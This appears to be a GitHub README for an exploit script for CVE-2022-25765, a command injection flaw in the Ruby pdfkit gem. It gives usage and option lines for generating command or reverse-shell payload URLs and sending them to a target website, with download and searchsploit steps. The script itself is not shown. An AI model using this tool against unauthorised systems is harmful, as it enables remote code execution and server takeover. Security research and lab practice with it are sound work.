Exploit for CVE-2022–25765 (pdfkit) - Command Injection

Like this repo? Give us a ⭐!

For educational and authorized security research purposes only.

Exploit Author

@UNICORDev by (@NicPWNs and @Dev-Yeoj)

Vulnerability Description

The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.

Exploit Description

A ruby gem pdfkit is commonly used for converting websites or HTML to PDF documents. Vulnerable versions (< 0.8.7.2) of this software can be passed a specially crafted URL containing a command that will be executed. This exploit generates executable URLs or sends them to a vulnerable website running pdfkit.

Usage

  python3 exploit-CVE-2022–25765.py -c <command>
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
  python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -h

Options

  -c    Custom command mode. Provide command to generate custom payload with.
  -s    Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
  -w    URL of website running vulnerable pdfkit. (Optional)
  -p    POST parameter on website running vulnerable pdfkit. (Optional)
  -h    Show this help menu.

Download

Download exploit-CVE-2022-25765.py from GitHub

Download exploit-CVE-2022-25765.py from ExploitDB

Searchsploit (ExploitDB)

searchsploit -u
searchsploit -m 51293

Exploit Requirements

• python3
• python3:requests
• python3:urllib3

Demo

Custom Command Mode

Reverse Shell Sent to Target Website Mode

Tested On

pdfkit Version 0.8.6

Applies To

pdfkit Versions < 0.8.7.2

Test Environment

gem install pdfkit -v 0.8.6

Credits

• https://nvd.nist.gov/vuln/detail/CVE-2022-25765
• https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
• https://app.hackthebox.com/machines/Precious
• https://www.exploit-db.com/exploits/51293